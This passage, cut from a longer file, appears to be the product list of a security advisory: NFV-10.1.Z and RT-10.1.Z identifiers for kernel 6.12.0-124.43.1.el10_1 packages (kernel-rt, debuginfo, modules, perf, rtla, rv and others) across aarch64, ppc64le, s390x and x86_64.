"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
